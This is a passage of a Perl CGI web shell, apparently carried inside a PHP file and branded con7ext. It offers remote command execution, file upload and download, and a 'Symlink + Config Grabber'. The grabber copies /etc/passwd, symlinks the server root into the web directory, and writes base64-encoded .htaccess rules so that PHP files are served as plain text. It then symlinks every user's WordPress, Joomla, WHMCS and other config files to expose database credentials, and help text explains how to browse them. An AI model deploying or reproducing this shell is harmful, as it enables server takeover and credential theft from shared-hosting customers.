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) format('woff');
    font-weight: normal;
    font-style: normal;

}

body {
font-family: "ubuntu_monoregular";
font-size:12px;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
background-color:#2d2b2b;
color:lime;
background-image: url('https://con7ext-security.com/images/eromanga.png');
}
#nav{position:fixed;z-index:999;top:0;width:100%;left:70%;
}
a.nav-fokus {display:block; width:auto; height:auto; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff;  border-bottom:1px solid #fff;  padding:5px 8px; text-align:center; text-decoration:none; color:red; line-height:20px; overflow:hidden; float:left;
}
a.nav-fokus:hover {color:#FFFFFF; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff;  border-bottom:1px solid #fff;
}
input[type=text]{
	background: transparent; 
	color:white;
	margin:0 10px;
	font-family:Homenaje;
	font-size:13px;
	border:none;
}
input[type=submit] {
	background: black; 
	color:white;
	margin:0 10px;
	font-family:Homenaje;
	font-size:13px;
	border:none;

</style>
</head>
<body onLoad="document.f.@_.focus()" bgcolor="2d2b2b" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<div id="nav">
<a class="nav-fokus" href="$ScriptLocation?"><b>Home</b></a>
<a class="nav-fokus" href="$ScriptLocation?a=help"><b>Help</b></a>
<a class="nav-fokus" href="$ScriptLocation?a=upload"><b>Upload</b></a>
<a class="nav-fokus" href="$ScriptLocation?a=download"><b>Download</b></a>
<a class="nav-fokus" href="$ScriptLocation?a=symconfig"><b>Symlink + Config Grabber</b></a></div>
<br>
<font color="lime" size="3">
END
}
sub PrintPageFooter
{
print "</font></body></html>";
}

sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}

sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="?">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
</form>
</code>
END
}

sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
print <<END;
<code><center><br>
<font color=lime><b><i><form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</i></b></font></center>
</code>
END
}

sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code><br><center><font color=lime><b><i><form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: <input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload: <input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form></i></b></font>
</center>
</code>
END
}

sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}
sub ExecuteCommand
{
   if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
    {
        # we change the directory internally. The output of the
        # command is not displayed.
       
        $OldDir = $CurrentDir;
        $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
        chop($CurrentDir = `$Command`);
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
        print "<code>$Prompt $RunCommand</code>";
    }
    else # some other command, display the output
    {
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
        print "<code>$Prompt $RunCommand</code><xmp>";
        $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
        if(!$WinNT)
        {
            $SIG{'ALRM'} = \&CommandTimeout;
            alarm($CommandTimeoutDuration);
        }
        if($ShowDynamicOutput) # show output as it is generated
        {
            $|=1;
            $Command .= " |";
            open(CommandOutput, $Command);
            while(<CommandOutput>)
            {
                $_ =~ s/(\n|\r\n)$//;
                print "$_\n";
            }
            $|=0;
        }
        else # show output after command completes
        {
            print `$Command`;
        }
        if(!$WinNT)
        {
            alarm(0);
        }
        print "</xmp>";
    }
    &PrintCommandLineInputForm;
    &PrintPageFooter;
}
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "<code>Failed to download $FileUrl: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
sub SymConfig
{
use File::Copy; use strict; use warnings; use MIME::Base64;
my $filename = 'passwd.txt';
if (!-e $filename) { copy("/etc/passwd","passwd.txt") ;
}
mkdir "symlink_config";
symlink("/","symlink_config/root");
my $htaccess = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBjb243ZXh0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgDQpBZGRIYW5kbGVyIHRleHQvcGxhaW4gLnBocA0KU2F0aXNmeSBBbnkNCkluZGV4T3B0aW9ucyArQ2hhcnNldD1VVEYtOCArRmFuY3lJbmRleGluZyArSWdub3JlQ2FzZSArRm9sZGVyc0ZpcnN0ICtYSFRNTCArSFRNTFRhYmxlICtTdXBwcmVzc1J1bGVzICtTdXBwcmVzc0Rlc2NyaXB0aW9uICtOYW1lV2lkdGg9KiANCkluZGV4SWdub3JlICoudHh0NDA0DQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9IF4uKnN5bWxpbmtfY29uZmlnIFtOQ10NClJld3JpdGVSdWxlIFwudHh0JCAle1JFUVVFU1RfVVJJfTQwNCBbTCxSPTMwMi5OQ10=");
my $xsym404 = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBjb243ZXh0Lmh0bQ0KSGVhZGVyTmFtZSBwcHEudHh0DQpTYXRpc2Z5IEFueQ0KSW5kZXhPcHRpb25zIElnbm9yZUNhc2UgRmFuY3lJbmRleGluZyBGb2xkZXJzRmlyc3QgTmFtZVdpZHRoPSogRGVzY3JpcHRpb25XaWR0aD0qIFN1cHByZXNzSFRNTFByZWFtYmxlDQpJbmRleElnbm9yZSAq");
open(my $fh1, '>', 'symlink_config/.htaccess'); print $fh1 "$htaccess"; close $fh1; open(my $xx, '>', 'symlink_config/nemu.txt'); print $xx "$xsym404"; close $xx; open(my $fh, '<:encoding(UTF-8)', $filename); while (my $row = <$fh>) { my @matches = $row =~ /(.*?):x:/g; my $usernya = $1; my @array = ( {configdir => '/home/'.$usernya.'/.accesshash', type => 'WHM-accesshash' }, {configdir => '/home/'.$usernya.'/public_html/config/koneksi.php', type => 'Lokomedia' }, {configdir => '/home/'.$usernya.'/public_html/lib/config.php', type => 'Balitbang' }, {configdir => '/home/'.$usernya.'/public_html/config/settings.inc.php', type => 'PrestaShop' }, {configdir => '/home/'.$usernya.'/public_html/app/etc/local.xml', type => 'Magento' }, {configdir => '/home/'.$usernya.'/public_html/admin/config.php', type => 'OpenCart' }, {configdir => '/home/'.$usernya.'/public_html/application/config/database.php', type => 'Ellislab' }, {configdir => '/home/'.$usernya.'/public_html/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/wp/test/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/blog/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/beta/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/portal/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/site/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/wp/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/WP/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/news/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/wordpress/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/test/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/demo/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/home/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/v1/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/v2/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/press/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/new/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/blogs/wp-config.php', type => 'Wordpress' }, {configdir => '/home/'.$usernya.'/public_html/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/blog/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/submitticket.php', type => '^WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/cms/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/beta/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/portal/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/site/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/main/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/home/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/demo/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/test/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/v1/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/v2/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/joomla/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/new/configuration.php', type => 'Joomla' }, {configdir => '/home/'.$usernya.'/public_html/WHMCS/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/whmcs1/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Whmcs/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/WHMC/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Whmc/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/whmc/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/WHM/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Whm/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/whm/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/HOST/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Host/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/host/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/SUPPORTES/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Supportes/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/supportes/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/domains/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/domain/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Hosting/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/HOSTING/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/hosting/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/CART/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Cart/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/cart/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/ORDER/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Order/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/order/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/CLIENT/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Client/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/client/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/CLIENTAREA/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Clientarea/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/clientarea/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/SUPPORT/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Support/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/support/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/BILLING/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Billing/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/billing/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/BUY/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Buy/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/buy/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/MANAGE/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Manage/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/manage/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/CLIENTSUPPORT/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/ClientSupport/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Clientsupport/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/clientsupport/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/CHECKOUT/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Checkout/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/checkout/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/BASKET/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Basket/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/basket/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/SECURE/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Secure/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/secure/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/SALES/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Sales/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/sales/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/BILL/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Bill/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/bill/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/PURCHASE/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Purchase/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/purchase/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/ACCOUNT/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Account/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/account/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/USER/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/User/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/user/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/CLIENTS/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Clients/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/clients/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/MY/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/My/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/my/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/secure/whm/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/secure/whmcs/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/panel/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/clientes/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/cliente/submitticket.php', type => 'WHMCS' }, {configdir => '/home/'.$usernya.'/public_html/support/order/submitticket.php', type => 'WHMCS' } ); foreach (@array){ my $confignya = $_->{configdir}; my $typeconfig = $_->{type}; symlink("$confignya","symlink_config/$usernya-$typeconfig.txt"); mkdir "symlink_config/$usernya-$typeconfig.txt404"; symlink("$confignya","symlink_config/$usernya-$typeconfig.txt404/ppq.txt"); copy("symlink_config/nemu.txt","symlink_config/$usernya-$typeconfig.txt404/.htaccess") ; } } print "success";
}
sub Help
{
print "<code> How To User Symlink + Config Grabber? Just Klik Symlink + Config Grabber<br>";
print " Then Check Dirs By Enter The URL<br>";
print " Example: site.com/cgidirs/symlink_config<br>";
print " For Symlink Just Add In Url<br>";
print " Example: site.com/cgidirs/symlink_config/root/</code>";
}
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
}
else # failed to open file
{
&PrintPageHeader("f");
print "<code>Failed to download $SendFile: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}


sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}

if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");

# start the uploading process
print "<code>Uploading $TransferFile to $CurrentDir...<br>";

# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;

$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.<br>";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.<br>";
print "File Path: $TargetName<br>";
}
else
{
print "Failed: $!<br>";
}
}
print "</code>";
&PrintCommandLineInputForm;
&PrintPageFooter;
}

sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}

# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}

if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}

&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "command" if($Action eq "");

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
if($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "symconfig")
{
&PrintPageHeader;
print &SymConfig;
}elsif($Action eq "help")
{
&PrintPageHeader;
print &Help;
}");
15define("SYM", "Options Indexes FollowSymLinks \n DirectoryIndex con7ext.htm \n AddType text/plain .php \n AddHandler text/plain .php \n Satisfy Any");
